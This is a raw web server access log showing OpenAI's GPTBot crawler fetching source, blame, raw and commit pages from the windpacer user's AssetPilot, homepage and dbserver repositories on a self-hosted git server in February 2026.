"/windpacer/AssetPilot/find/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96" [Client 74.7.227.38] [Length 7515] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96" -[17/Feb/2026:13:30:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.gitignore" [Client 74.7.227.38] [Length 11109] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96" -[17/Feb/2026:13:30:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker" [Client 74.7.227.38] [Length 16032] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96" -[17/Feb/2026:13:30:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument" [Client 74.7.227.38] [Length 11421] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96" -[17/Feb/2026:13:30:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a.diff" [Client 74.7.227.38] [Length 135523] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a" -[17/Feb/2026:13:30:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a.patch" [Client 74.7.227.38] [Length 136094] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a" -[17/Feb/2026:13:30:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" [Client 74.7.227.38] [Length 10105] [Gzip 2.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977" -[17/Feb/2026:13:30:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?files=npm%2fdata%2flogs" [Client 74.7.227.38] [Length 23402] [Gzip 4.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs" -[17/Feb/2026:13:30:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues" [Client 74.7.227.38] [Length 10095] [Gzip 3.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/forks" -[17/Feb/2026:13:30:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/Dockerfile" [Client 74.7.227.38] [Length 11576] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d" -[17/Feb/2026:13:30:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html?display=rendered" [Client 74.7.227.38] [Length 14339] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html" -[17/Feb/2026:13:30:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html?display=rendered" [Client 74.7.227.38] [Length 14334] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html" -[17/Feb/2026:13:30:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.gitignore" [Client 74.7.227.38] [Length 119] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.gitignore" -[17/Feb/2026:13:30:22 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker" -[17/Feb/2026:13:30:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/Dockerfile" [Client 74.7.227.38] [Length 12450] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker" -[17/Feb/2026:13:30:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/assetpilot.ico" [Client 74.7.227.38] [Length 10833] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument" -[17/Feb/2026:13:30:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/QUICKSTART.md" [Client 74.7.227.38] [Length 12754] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument" -[17/Feb/2026:13:30:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/init_db.py" [Client 74.7.227.38] [Length 16153] [Gzip 5.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker" -[17/Feb/2026:13:30:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates" [Client 74.7.227.38] [Length 10077] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker" -[17/Feb/2026:13:30:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/claude.md" [Client 74.7.227.38] [Length 13428] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument" -[17/Feb/2026:13:30:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones" [Client 74.7.227.38] [Length 8459] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues" -[17/Feb/2026:13:30:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/import_csv.py" [Client 74.7.227.38] [Length 14277] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker" -[17/Feb/2026:13:30:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/Dockerfile" [Client 74.7.227.38] [Length 10761] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/Dockerfile" -[17/Feb/2026:13:30:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/labels" [Client 74.7.227.38] [Length 7623] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues" -[17/Feb/2026:13:30:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker" [Client 74.7.227.38] [Length 10087] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker" -[17/Feb/2026:13:30:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/Dockerfile" [Client 74.7.227.38] [Length 11874] [Gzip 4.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/Dockerfile" -[17/Feb/2026:13:30:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/Dockerfile" [Client 74.7.227.38] [Length 859] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/Dockerfile" -[17/Feb/2026:13:30:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/assetpilot.ico" [Client 74.7.227.38] [Length 259718] [Gzip 13.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/assetpilot.ico" -[17/Feb/2026:13:30:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/assetpilot.ico" [Client 74.7.227.38] [Length 9927] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/assetpilot.ico" -[17/Feb/2026:13:30:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/assetpilot.ico" [Client 74.7.227.38] [Length 237700] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/assetpilot.ico" -[17/Feb/2026:13:30:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/claude.md" [Client 74.7.227.38] [Length 15449] [Gzip 8.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/claude.md" -[17/Feb/2026:13:30:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/QUICKSTART.md" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/QUICKSTART.md" -[17/Feb/2026:13:30:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/QUICKSTART.md" [Client 74.7.227.38] [Length 14868] [Gzip 9.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/QUICKSTART.md" -[17/Feb/2026:13:30:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/QUICKSTART.md" [Client 74.7.227.38] [Length 2208] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/QUICKSTART.md" -[17/Feb/2026:13:30:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/init_db.py" [Client 74.7.227.38] [Length 5009] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/init_db.py" -[17/Feb/2026:13:30:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates" [Client 74.7.227.38] [Length 10122] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates" -[17/Feb/2026:13:30:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/claude.md" [Client 74.7.227.38] [Length 9925] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/claude.md" -[17/Feb/2026:13:30:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/Dockerfile" [Client 74.7.227.38] [Length 9921] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/Dockerfile" -[17/Feb/2026:13:30:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker" [Client 74.7.227.38] [Length 15976] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker" -[17/Feb/2026:13:30:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/assetpilot.ico" [Client 74.7.227.38] [Length 10804] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/assetpilot.ico" -[17/Feb/2026:13:30:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/claude.md" [Client 74.7.227.38] [Length 4068] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/claude.md" -[17/Feb/2026:13:30:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/import_csv.py" [Client 74.7.227.38] [Length 2651] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/import_csv.py" -[17/Feb/2026:13:30:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/QUICKSTART.md" [Client 74.7.227.38] [Length 12724] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/QUICKSTART.md" -[17/Feb/2026:13:30:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates/index.html" [Client 74.7.227.38] [Length 16417] [Gzip 5.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates" -[17/Feb/2026:13:30:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/init_db.py" [Client 74.7.227.38] [Length 16597] [Gzip 8.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/init_db.py" -[17/Feb/2026:13:30:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/init_db.py" [Client 74.7.227.38] [Length 9929] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/init_db.py" -[17/Feb/2026:13:30:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/templates" [Client 74.7.227.38] [Length 9975] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates" -[17/Feb/2026:13:30:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/claude.md" [Client 74.7.227.38] [Length 13397] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/claude.md" -[17/Feb/2026:13:30:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/Dockerfile" [Client 74.7.227.38] [Length 12420] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/Dockerfile" -[17/Feb/2026:13:30:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker" [Client 74.7.227.38] [Length 9874] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker" -[17/Feb/2026:13:30:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/assetpilot.ico" [Client 74.7.227.38] [Length 259678] [Gzip 13.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/assetpilot.ico" -[17/Feb/2026:13:30:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/assetpilot.ico" [Client 74.7.227.38] [Length 237700] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/assetpilot.ico" -[17/Feb/2026:13:30:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/assetpilot.ico" [Client 74.7.227.38] [Length 9898] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/assetpilot.ico" -[17/Feb/2026:13:30:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr 